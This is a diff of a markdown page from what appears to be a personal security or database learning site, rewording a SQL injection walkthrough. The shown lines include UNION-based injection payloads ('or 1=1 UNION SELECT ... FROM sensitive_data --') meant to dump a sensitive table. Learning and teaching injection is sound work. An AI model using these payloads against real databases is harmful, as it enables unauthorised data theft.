blnknlights/blnknlights.github.io/docs/source/other/dba/dba.md

 +----------+----------------+-------------------------------+
 ```

-Great at this point we know a lot, we know exactly what the tables are,
+Great at this point we know a lot, we know exactly what the tables name are,
 but also their schemas, which means we know the name of each of their respective columns.
 So we can use UNION again to get the 3 specific columns we want from the sensitive data table.
-But also, it turns out there's just 3 colums in `sensitive_data` just like our users statement
+And it turns out there's just 3 colums in `sensitive_data` just like our users select statement
-so we can just `SELECT *`.
+so we can just `SELECT *` from `sensitive_data` and we should be golden.
 ```sql
 select username,role,email from users where username == 'admin' or 1=1 UNION SELECT id,data_type,content FROM sensitive_data --';
 select username,role,email from users where username == 'admin' or 1=1 UNION SELECT * FROM sensitive_data --';